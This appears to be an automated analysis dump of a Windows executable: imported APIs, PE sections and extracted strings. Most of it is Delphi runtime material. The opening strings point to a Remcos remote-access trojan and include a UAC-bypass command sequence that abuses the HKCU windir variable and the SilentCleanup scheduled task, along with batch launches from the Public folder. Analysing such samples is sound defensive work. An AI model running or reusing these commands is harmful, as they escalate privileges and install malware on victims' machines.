gdiplus.dll.GdipSaveImageToFile
gdiplus.dll.GdiplusStartup
gdiplus.dll.GdipGetImageEncoders
gdiplus.dll.GdipGetImageEncodersSize
gdiplus.dll.GdipFree
wininet.dll.InternetCloseHandle
wininet.dll.InternetOpenUrlA
wininet.dll.InternetOpenA
wininet.dll.InternetReadFile
user32.dll.GetCursorInfo
user32.dll.GetLastInputInfo
kernel32.dll.GetConsoleWindow
psapi.dll.GetModuleFileNameExA
psapi.dll.GetModuleFileNameExW
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.IsWow64Process
kernel32.dll.GetComputerNameExW
shell32.dll.IsUserAnAdmin
kernel32.dll.SetProcessDEPPolicy
"C:\Users\Public\Natso.bat"
cmd /c ""C:\Users\Public\Natso.bat" "
"C:\Users\Public\Yeso.bat"
cmd /c ""C:\Users\Public\Yeso.bat" "
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Program Files (x86)\internet explorer\ieinstal.exe
reg delete hkcu\Environment /v windir /f
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
"C:\Windows \System32\perfmon.exe"
C:\Windows \System32\perfmon.exe
Remcos_Mutex_Inj
Remcos-GMZ5DV

PE Information

Image Base 0x00400000
Entry Point 0x0046012c
Reported Checksum 0x00000000
Actual Checksum 0x001781cb
Minimum OS Version 4.0
Compile Time 1992-06-19 22:22:17
Import Hash 1485be28b39750a17c94ed310167c8e6

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
CODE 0x00001000 0x0005f17c 0x0005f200 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.54
DATA 0x00061000 0x00001208 0x00001400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 3.88
BSS 0x00063000 0x0007ad39 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.idata 0x000de000 0x000023cc 0x00002400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.05
.tls 0x000e1000 0x00000010 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rdata 0x000e2000 0x00000018 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 0.19
.reloc 0x000e3000 0x00006650 0x00006800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.64
.rsrc 0x000ea000 0x00005800 0x00005800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 4.22

Overlay

Offset 0x0006f000
Size 0x00101c0c

Imports

Library kernel32.dll:
0x4de13c VirtualFree
0x4de140 VirtualAlloc
0x4de144 LocalFree
0x4de148 LocalAlloc
0x4de14c GetVersion
0x4de150 GetCurrentThreadId
0x4de15c VirtualQuery
0x4de160 WideCharToMultiByte
0x4de164 MultiByteToWideChar
0x4de168 lstrlenA
0x4de16c lstrcpynA
0x4de170 LoadLibraryExA
0x4de174 GetThreadLocale
0x4de178 GetStartupInfoA
0x4de17c GetProcAddress
0x4de180 GetModuleHandleA
0x4de184 GetModuleFileNameA
0x4de188 GetLocaleInfoA
0x4de18c GetLastError
0x4de190 GetCommandLineA
0x4de194 FreeLibrary
0x4de198 FindFirstFileA
0x4de19c FindClose
0x4de1a0 ExitProcess
0x4de1a4 WriteFile
0x4de1ac SetFilePointer
0x4de1b0 SetEndOfFile
0x4de1b4 RtlUnwind
0x4de1b8 ReadFile
0x4de1bc RaiseException
0x4de1c0 GetStdHandle
0x4de1c4 GetFileSize
0x4de1c8 GetFileType
0x4de1cc CreateFileA
0x4de1d0 CloseHandle
Library user32.dll:
0x4de1d8 GetKeyboardType
0x4de1dc LoadStringA
0x4de1e0 MessageBoxA
0x4de1e4 CharNextA
Library advapi32.dll:
0x4de1ec RegQueryValueExA
0x4de1f0 RegOpenKeyExA
0x4de1f4 RegCloseKey
Library oleaut32.dll:
0x4de1fc SysFreeString
0x4de200 SysReAllocStringLen
0x4de204 SysAllocStringLen
Library kernel32.dll:
0x4de20c TlsSetValue
0x4de210 TlsGetValue
0x4de214 LocalAlloc
0x4de218 GetModuleHandleA
Library advapi32.dll:
0x4de220 RegQueryValueExA
0x4de224 RegOpenKeyExA
0x4de228 RegCloseKey
Library kernel32.dll:
0x4de230 lstrcpyA
0x4de234 WriteFile
0x4de238 WaitForSingleObject
0x4de23c VirtualQuery
0x4de240 VirtualProtect
0x4de244 VirtualAlloc
0x4de248 Sleep
0x4de24c SizeofResource
0x4de250 SetThreadLocale
0x4de254 SetFilePointer
0x4de258 SetEvent
0x4de25c SetErrorMode
0x4de260 SetEndOfFile
0x4de264 ResetEvent
0x4de268 ReadFile
0x4de26c MulDiv
0x4de270 LockResource
0x4de274 LoadResource
0x4de278 LoadLibraryA
0x4de284 GlobalUnlock
0x4de288 GlobalReAlloc
0x4de28c GlobalHandle
0x4de290 GlobalLock
0x4de294 GlobalFree
0x4de298 GlobalFindAtomA
0x4de29c GlobalDeleteAtom
0x4de2a0 GlobalAlloc
0x4de2a4 GlobalAddAtomA
0x4de2a8 GetVersionExA
0x4de2ac GetVersion
0x4de2b0 GetTickCount
0x4de2b4 GetThreadLocale
0x4de2b8 GetSystemInfo
0x4de2bc GetStringTypeExA
0x4de2c0 GetStdHandle
0x4de2c4 GetProcAddress
0x4de2c8 GetModuleHandleA
0x4de2cc GetModuleFileNameA
0x4de2d0 GetLocaleInfoA
0x4de2d4 GetLocalTime
0x4de2d8 GetLastError
0x4de2dc GetFullPathNameA
0x4de2e0 GetDiskFreeSpaceA
0x4de2e4 GetDateFormatA
0x4de2e8 GetCurrentThreadId
0x4de2ec GetCurrentProcessId
0x4de2f0 GetCPInfo
0x4de2f4 GetACP
0x4de2f8 FreeResource
0x4de2fc InterlockedExchange
0x4de300 FreeLibrary
0x4de304 FormatMessageA
0x4de308 FindResourceA
0x4de30c FindFirstFileA
0x4de310 FindClose
0x4de31c EnumCalendarInfoA
0x4de328 CreateThread
0x4de32c CreateFileA
0x4de330 CreateEventA
0x4de334 CompareStringA
0x4de338 CloseHandle
Library version.dll:
0x4de340 VerQueryValueA
0x4de348 GetFileVersionInfoA
Library gdi32.dll:
0x4de350 UnrealizeObject
0x4de354 StretchBlt
0x4de358 SetWindowOrgEx
0x4de35c SetWindowExtEx
0x4de360 SetWinMetaFileBits
0x4de364 SetViewportOrgEx
0x4de368 SetViewportExtEx
0x4de36c SetTextColor
0x4de370 SetStretchBltMode
0x4de374 SetROP2
0x4de378 SetPixel
0x4de37c SetMapMode
0x4de380 SetEnhMetaFileBits
0x4de384 SetDIBColorTable
0x4de388 SetBrushOrgEx
0x4de38c SetBkMode
0x4de390 SetBkColor
0x4de394 SelectPalette
0x4de398 SelectObject
0x4de39c SaveDC
0x4de3a0 RestoreDC
0x4de3a4 Rectangle
0x4de3a8 RectVisible
0x4de3ac RealizePalette
0x4de3b0 PolyPolyline
0x4de3b4 PlayEnhMetaFile
0x4de3b8 PatBlt
0x4de3bc MoveToEx
0x4de3c0 MaskBlt
0x4de3c4 LineTo
0x4de3c8 IntersectClipRect
0x4de3cc GetWindowOrgEx
0x4de3d0 GetWinMetaFileBits
0x4de3d4 GetTextMetricsA
0x4de3d8 GetTextExtentPointA
0x4de3e4 GetStockObject
0x4de3e8 GetPixel
0x4de3ec GetPaletteEntries
0x4de3f0 GetObjectA
0x4de3fc GetEnhMetaFileBits
0x4de400 GetDeviceCaps
0x4de404 GetDIBits
0x4de408 GetDIBColorTable
0x4de40c GetDCOrgEx
0x4de414 GetClipBox
0x4de418 GetBrushOrgEx
0x4de41c GetBitmapBits
0x4de420 ExtCreatePen
0x4de424 ExcludeClipRect
0x4de428 Ellipse
0x4de42c DeleteObject
0x4de430 DeleteEnhMetaFile
0x4de434 DeleteDC
0x4de438 CreateSolidBrush
0x4de43c CreatePenIndirect
0x4de440 CreatePalette
0x4de448 CreateFontIndirectA
0x4de44c CreateDIBitmap
0x4de450 CreateDIBSection
0x4de454 CreateCompatibleDC
0x4de45c CreateBrushIndirect
0x4de460 CreateBitmap
0x4de464 CopyEnhMetaFileA
0x4de468 BitBlt
Library user32.dll:
0x4de470 CreateWindowExA
0x4de474 WindowFromPoint
0x4de478 WinHelpA
0x4de47c WaitMessage
0x4de480 ValidateRect
0x4de484 UpdateWindow
0x4de488 UnregisterClassA
0x4de48c UnionRect
0x4de490 UnhookWindowsHookEx
0x4de494 TranslateMessage
0x4de49c TrackPopupMenu
0x4de4a4 ShowWindow
0x4de4a8 ShowScrollBar
0x4de4ac ShowOwnedPopups
0x4de4b0 ShowCursor
0x4de4b4 SetWindowsHookExA
0x4de4b8 SetWindowTextA
0x4de4bc SetWindowPos
0x4de4c0 SetWindowPlacement
0x4de4c4 SetWindowLongA
0x4de4c8 SetTimer
0x4de4cc SetScrollRange
0x4de4d0 SetScrollPos
0x4de4d4 SetScrollInfo
0x4de4d8 SetRect
0x4de4dc SetPropA
0x4de4e0 SetParent
0x4de4e4 SetMenuItemInfoA
0x4de4e8 SetMenu
0x4de4ec SetKeyboardState
0x4de4f0 SetForegroundWindow
0x4de4f4 SetFocus
0x4de4f8 SetCursor
0x4de4fc SetClipboardData
0x4de500 SetClassLongA
0x4de504 SetCapture
0x4de508 SetActiveWindow
0x4de50c SendMessageA
0x4de510 ScrollWindowEx
0x4de514 ScrollWindow
0x4de518 ScreenToClient
0x4de51c RemovePropA
0x4de520 RemoveMenu
0x4de524 ReleaseDC
0x4de528 ReleaseCapture
0x4de534 RegisterClassA
0x4de538 RedrawWindow
0x4de53c PtInRect
0x4de540 PostQuitMessage
0x4de544 PostMessageA
0x4de548 PeekMessageA
0x4de54c OpenClipboard
0x4de550 OffsetRect
0x4de554 OemToCharA
0x4de558 MessageBoxA
0x4de55c MessageBeep
0x4de560 MapWindowPoints
0x4de564 MapVirtualKeyA
0x4de568 LoadStringA
0x4de56c LoadKeyboardLayoutA
0x4de570 LoadIconA
0x4de574 LoadCursorA
0x4de578 LoadBitmapA
0x4de57c KillTimer
0x4de580 IsZoomed
0x4de584 IsWindowVisible
0x4de588 IsWindowEnabled
0x4de58c IsWindow
0x4de590 IsRectEmpty
0x4de594 IsIconic
0x4de598 IsDialogMessageA
0x4de59c IsChild
0x4de5a0 IsCharAlphaNumericA
0x4de5a4 IsCharAlphaA
0x4de5a8 InvalidateRect
0x4de5ac IntersectRect
0x4de5b0 InsertMenuItemA
0x4de5b4 InsertMenuA
0x4de5b8 InflateRect
0x4de5c0 GetWindowTextA
0x4de5c4 GetWindowRect
0x4de5c8 GetWindowPlacement
0x4de5cc GetWindowLongA
0x4de5d0 GetWindowDC
0x4de5d4 GetTopWindow
0x4de5d8 GetSystemMetrics
0x4de5dc GetSystemMenu
0x4de5e0 GetSysColorBrush
0x4de5e4 GetSysColor
0x4de5e8 GetSubMenu
0x4de5ec GetScrollRange
0x4de5f0 GetScrollPos
0x4de5f4 GetScrollInfo
0x4de5f8 GetPropA
0x4de5fc GetParent
0x4de600 GetWindow
0x4de604 GetMessageTime
0x4de608 GetMenuStringA
0x4de60c GetMenuState
0x4de610 GetMenuItemInfoA
0x4de614 GetMenuItemID
0x4de618 GetMenuItemCount
0x4de61c GetMenu
0x4de620 GetLastActivePopup
0x4de624 GetKeyboardState
0x4de62c GetKeyboardLayout
0x4de630 GetKeyState
0x4de634 GetKeyNameTextA
0x4de638 GetIconInfo
0x4de63c GetForegroundWindow
0x4de640 GetFocus
0x4de644 GetDoubleClickTime
0x4de648 GetDesktopWindow
0x4de64c GetDCEx
0x4de650 GetDC
0x4de654 GetCursorPos
0x4de658 GetCursor
0x4de65c GetClipboardData
0x4de660 GetClientRect
0x4de664 GetClassNameA
0x4de668 GetClassInfoA
0x4de66c GetCaretPos
0x4de670 GetCapture
0x4de674 GetActiveWindow
0x4de678 FrameRect
0x4de67c FindWindowA
0x4de680 FillRect
0x4de684 EqualRect
0x4de688 EnumWindows
0x4de68c EnumThreadWindows
0x4de694 EndPaint
0x4de698 EnableWindow
0x4de69c EnableScrollBar
0x4de6a0 EnableMenuItem
0x4de6a4 EmptyClipboard
0x4de6a8 DrawTextA
0x4de6ac DrawMenuBar
0x4de6b0 DrawIconEx
0x4de6b4 DrawIcon
0x4de6b8 DrawFrameControl
0x4de6bc DrawFocusRect
0x4de6c0 DrawEdge
0x4de6c4 DispatchMessageA
0x4de6c8 DestroyWindow
0x4de6cc DestroyMenu
0x4de6d0 DestroyIcon
0x4de6d4 DestroyCursor
0x4de6d8 DeleteMenu
0x4de6dc DefWindowProcA
0x4de6e0 DefMDIChildProcA
0x4de6e4 DefFrameProcA
0x4de6e8 CreatePopupMenu
0x4de6ec CreateMenu
0x4de6f0 CreateIcon
0x4de6f4 CloseClipboard
0x4de6f8 ClientToScreen
0x4de6fc CheckMenuItem
0x4de700 CallWindowProcA
0x4de704 CallNextHookEx
0x4de708 BeginPaint
0x4de70c CharNextA
0x4de710 CharLowerBuffA
0x4de714 CharLowerA
0x4de718 CharUpperBuffA
0x4de71c CharToOemA
0x4de720 AdjustWindowRectEx
Library kernel32.dll:
0x4de72c Sleep
Library oleaut32.dll:
0x4de734 SafeArrayPtrOfIndex
0x4de738 SafeArrayGetUBound
0x4de73c SafeArrayGetLBound
0x4de740 SafeArrayCreate
0x4de744 VariantChangeType
0x4de748 VariantCopy
0x4de74c VariantClear
0x4de750 VariantInit
Library comctl32.dll:
0x4de760 ImageList_Write
0x4de764 ImageList_Read
0x4de774 ImageList_DragMove
0x4de778 ImageList_DragLeave
0x4de77c ImageList_DragEnter
0x4de780 ImageList_EndDrag
0x4de784 ImageList_BeginDrag
0x4de788 ImageList_Remove
0x4de78c ImageList_DrawEx
0x4de790 ImageList_Draw
0x4de7a0 ImageList_Add
0x4de7ac ImageList_Destroy
0x4de7b0 ImageList_Create
Library kernel32.dll:
0x4de7b8 MulDiv

`DATA
.idata
.rdata
P.reloc
P.rsrc
System
IInterface
UhU*@
Uhm<@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
Uh9H@
tDhT^@
kernel32.dll
GetLongPathNameA
Uhl_@
Software\Borland\Locales
Software\Borland\Delphi\Locales
UhWf@
UhKg@
Uhnh@
Magellan MSWHEEL
MouseZ
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
Uh]x@
Exceptionl|@
EInOutError|}@
False
AM/PM
D$LPj
m/d/yy
mmmm d, yyyy
AMPM
AMPM
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarOr
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
Variants
Empty
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Error
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
Int64
String
Array
ByRef
t~h$8F
False
Classesd!A
TNotifyEvent
TObject
EFOpenError`#A
EWriteErrorh$A
TPersistentX(A
Classes
TInterfacedPersistentH)A
Classes
TStrings4*A
Classes
TStringListd+A
Classes
TCustomMemoryStreamT.A
EThread@2A
TComponentNameT2A
TComponent|3A
TBasicAction\5A
Classes
Uh+=A
UhdAA
UhIBA
Uh3CA
;503A
Uh<JA
UhbMA
Uh[NA
Uh?TA
Uh"TA
Strings
UhMVA
Uh4XA
UhOYA
Uhx[A
Uh!\A
Uhm^A
UhV`A
UhYmA
Owner
UhUvA
Uh"|A
UhG~A
False
%s_%d
TPUtilWindow
Graphics
TProgressEvent
TObject
TProgressStage
String
Graphics
Graphics
Graphics
Graphics
Graphics
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clRed
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
Default
E$PVSj
Graphics
Uh~%B
Uh/%B
Uhh)B
Uh/*B
Uh@-B
F0`*B
Uh{2B
Uh98B
UhV7B
Uh[<B
D$*Ph
Uh.@B
Uh8DB
\$4Vj
UhmGB
Uh_HB
Uh=KB
GetMonitorInfoA
GetSystemMetrics
MonitorFromRect
MonitorFromWindow
MonitorFromPoint
>(r[j
GetMonitorInfo
DISPLAY
>(r[j
GetMonitorInfoA
DISPLAY
>(r[j
GetMonitorInfoW
DISPLAY
EnumDisplayMonitors
USER32.DLL
IExtendedHelpViewerXWB
Uh&[B
Uh=]B
Uh^_B
UhQ`B
UhybB
Uh{cB
UhMgB
SVh iB
comctl32.dll
InitializeFlatSB
UninitializeFlatSB
FlatSB_GetScrollProp
FlatSB_SetScrollProp
FlatSB_EnableScrollBar
FlatSB_ShowScrollBar
FlatSB_GetScrollRange
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_SetScrollPos
FlatSB_SetScrollInfo
FlatSB_SetScrollRange
UhejB
uxtheme.dll
OpenThemeData
CloseThemeData
DrawThemeBackground
DrawThemeText
GetThemeBackgroundContentRect
GetThemePartSize
GetThemeTextExtent
GetThemeTextMetrics
GetThemeBackgroundRegion
HitTestThemeBackground
DrawThemeEdge
DrawThemeIcon
IsThemePartDefined
IsThemeBackgroundPartiallyTransparent
GetThemeColor
GetThemeMetric
GetThemeString
GetThemeBool
GetThemeInt
GetThemeEnumValue
GetThemePosition
GetThemeFont
GetThemeRect
GetThemeMargins
GetThemeIntList
GetThemePropertyOrigin
SetWindowTheme
GetThemeFilename
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysBool
GetThemeSysSize
GetThemeSysFont
GetThemeSysString
GetThemeSysInt
IsThemeActive
IsAppThemed
GetWindowTheme
EnableThemeDialogTexture
IsThemeDialogTextureEnabled
GetThemeAppProperties
SetThemeAppProperties
GetCurrentThemeName
GetThemeDocumentationProperty
DrawThemeParentBackground
EnableTheming
Theme manager 2001, 2002 Mike Lischke
comctl32.dll
!"#$%,~B
StdCtrls
StdCtrls'
Anchors
AutoSize0 A
DragMode
ParentBiDiMode
ParentColor
ParentFont
ParentShowHintX#D
PopupMenu
ShowAccelChar
ShowHint
Layout
Visible
WordWrapx!A
OnContextPopupx!A
OnDragDrop
OnMouseUpx!A
OnMouseEnterx!A
StdCtrls
StdCtrls&
Anchors0 A
BiDiMode
Constraints
DragMode
ModalResult
ParentBiDiMode
ParentFont
ParentShowHintX#D
PopupMenu
TabOrder
TabStop
Visible
WordWrapx!A
OnDragDrop
OnEndDragx!A
OnEnterx!A
BUTTON
Anchors
AutoSize
DragMode
Enabled
IncrementalDisplay
PictureX#D
PopupMenu
Proportional
ShowHint
Stretch
Transparent
Visiblex!A
OnContextPopupx!A
OnDragDrop
Intervalx!A
HelpContextx!A
OnClosex!A
Dialogs
%s%s%s%s%s%s%s%s%s%s
Cancel
Abort
Retry
Ignore
NoToAll
YesToAll
Image
Message
commdlg_help
commdlg_FindReplace
WndProcPtr%.8X%.8X
Clipbrd
Delphi Picture
Delphi Component
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
MS_WINHELP
#32770
Controls
Controls
Controls
Controls
TMouseEvent
TObject
TMouseButton
TShiftState
Integer
Integer
TMouseMoveEvent
TObject
TShiftState
Integer
Integer
TKeyEvent
TShiftState
TKeyPressEvent
TDragOverEvent
TObject
Integer
Integer
Boolean
TDragDropEvent
TObject
Integer
Integer
TStartDragEvent
TDragObject
TEndDragEvent
TObject
Integer
Integer
TDockDropEvent
TDragDockObject
Integer
Integer
TDockOverEvent
TDragDockObject
Integer
Integer
Boolean
TUnDockEvent
Boolean
TStartDockEvent
TDragDockObject
TGetSiteInfoEvent
Boolean
TCanResizeEvent
Boolean
TConstrainedResizeEvent
Integer
TMouseWheelEvent
TObject
TShiftState
Boolean
TMouseWheelUpDownEvent
TObject
Boolean
TContextPopupEvent
Boolean
Hint(!A
Controls
Controls
Controls
Controls
crDefault
crArrow
crCross
crIBeam
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crUpArrow
crHourGlass
crDrag
crNoDrop
crHSplit
crVSplit
crMultiDrag
crSQLWait
crAppStart
crHelp
crHandPoint
crSizeAll
crSize
Uhj C
UhB C
Uh)!C
%s (%s)
Uh[$C
Uh"4C
Uh)6C
UhN9C
Uh{AC
UhoDC
PhHJC
Ph\JC
IsControl
UhnUC
Uh<WC
Sh\uC
Uh|]C
UhweC
Uh#fC
Uh%gC
Uh!hC
C$PVj
UhJmC
PhhoC
DesignSize
UhntC
Uht{C
t&j7j
USER32
WINNLSEnableIME
imm32.dll
ImmGetContext
ImmReleaseContext
ImmGetConversionStatus
ImmSetConversionStatus
ImmSetOpenStatus
ImmSetCompositionWindow
ImmSetCompositionFontA
ImmGetCompositionStringA
ImmIsIME
ImmNotifyIME
Delphi%.8X
ControlOfs%.8X%.8X
USER32
AnimateWindow
ActnList
ActnList
ActnList
ImgList
Bitmap
comctl32.dll
comctl32.dll
ImageList_WriteEx
TMenuChangeEvent
TMenuItem
Boolean
TMenuDrawItemEvent
TRect
Boolean
TAdvancedMenuDrawItemEvent
TRect
TOwnerDrawState
TMenuMeasureItemEvent
Integer
Action
Caption
SubMenuImages
Default
ImageIndex
RadioItem`!A
ShortCut
Visiblex!A
TMainMenu$ D
AutoLineReduction
AutoMerge0 A
Images
OwnerDraw
Menus<"D
AutoLineReduction
AutoPopup0 A
MenuAnimation
OwnerDraw
OnChangex!A
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
Uh1)D
Uh?3D
Uh>4D
ShortCutText
Uhh8D
Uh>=D
Uh'KD
UhjFD
Uh"\D
6hD\D
UhgwD
Uh}uD
UhI|D
UhP}D
Margin
Range
ThumbSize
Tracking
IDesignerHookP2A
TCloseEvent
TCloseAction
TCloseQueryEvent
Boolean
TShortCutEvent
Boolean
Boolean
Forms
FormsU
Align
Anchors
AutoScroll
AutoSize0 A
Color
Constraints
Ctl3D
UseDockManager
DefaultMonitor
DragMode
Enabled
KeyPreviewl D
ObjectMenuItem
PixelsPerInchX#D
PrintScale
Scaled
ScreenSnap
VertScrollBar
WindowMenux!A
OnCanResizex!A
OnContextPopupx!A
OnCreatex!A
OnDblClickx!A
OnDestroyx!A
OnDragDrop
OnGetSiteInfox!A
OnMouseWheelUpx!A
OnPaintx!A
OnShortCutx!A
Forms
THintInfo@
Forms
PixelsPerInch
TextHeight
IgnoreFontProperty
MDICLIENT
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
layout text
TApplication
MAINICON
vcltest3.dll
RegisterAutomation
t<j@j
Uh.-E
UhN.E
UhU0E
Uh#1E
Uhl6E
Uh8<E
Uh]=E
ShDBE
User32.dll
SetLayeredWindowAttributes
TaskbarCreated
UhVGE
Uh)IE
UhAKE
UhQME
Uh\RE
UhPSE
UhVTE
UhrUE
UhEVE
UhnYE
UhI\E
Uh6^E
UhcaE
UhVeE
UhinE
TInplaceEdit,oE
Grids
TSelectCellEvent
TObject
Integer
Boolean
TDrawCellEvent
TObject
Integer
TRect
TGridDrawState
TCustomGridHuE
TCustomGrid(sE
TGetEditEvent
TObject
Integer
String
TSetEditEvent
TObject
Integer
String
TMovedEvent
TObject
Integer
Integer
Grids
Grids=
Anchors0 A
Constraints
DefaultRowHeight
DragMode
Options
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
ParentShowHintX#D
ScrollBars
TabOrder
VisibleRowCountx!A
OnClickLvE
OnContextPopupx!A
OnDragDrop
OnDragOver`rE
OnEndDragx!A
OnEnterx!A
OnMouseWheelUpLvE
OnStartDragx!A
ColWidths
RowHeights
DAK,,;
MainMenu1
Unit1
Erreur, vous ne pouvez pas jouer ce coup
OCTAPION.TXT
Error
Runtime error at 00000000
%.*dPz@
Tahoma
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
lstrcpyA
WriteFile
WaitForSingleObject
VirtualQuery
VirtualProtect
VirtualAlloc
Sleep
SizeofResource
SetThreadLocale
SetFilePointer
SetEvent
SetErrorMode
SetEndOfFile
ResetEvent
ReadFile
MulDiv
LockResource
LoadResource
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalFindAtomA
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetVersionExA
GetVersion
GetTickCount
GetThreadLocale
GetSystemInfo
GetStringTypeExA
GetStdHandle
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCPInfo
GetACP
FreeResource
InterlockedExchange
FreeLibrary
FormatMessageA
FindResourceA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateThread
CreateFileA
CreateEventA
CompareStringA
CloseHandle
version.dll
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll
UnrealizeObject
StretchBlt
SetWindowOrgEx
SetWindowExtEx
SetWinMetaFileBits
SetViewportOrgEx
SetViewportExtEx
SetTextColor
SetStretchBltMode
SetROP2
SetPixel
SetMapMode
SetEnhMetaFileBits
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
SaveDC
RestoreDC
Rectangle
RectVisible
RealizePalette
PolyPolyline
PlayEnhMetaFile
PatBlt
MoveToEx
MaskBlt
LineTo
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPointA
GetTextExtentPoint32A
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetDCOrgEx
GetCurrentPositionEx
GetClipBox
GetBrushOrgEx
GetBitmapBits
ExtCreatePen
ExcludeClipRect
Ellipse
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll
CreateWindowExA
WindowFromPoint
WinHelpA
WaitMessage
ValidateRect
UpdateWindow
UnregisterClassA
UnionRect
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowScrollBar
ShowOwnedPopups
ShowCursor
SetWindowsHookExA
SetWindowTextA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollRange
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetParent
SetMenuItemInfoA
SetMenu
SetKeyboardState
SetForegroundWindow
SetFocus
SetCursor
SetClipboardData
SetClassLongA
SetCapture
SetActiveWindow
SendMessageA
ScrollWindowEx
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClipboardFormatA
RegisterClassA
RedrawWindow
PtInRect
PostQuitMessage
PostMessageA
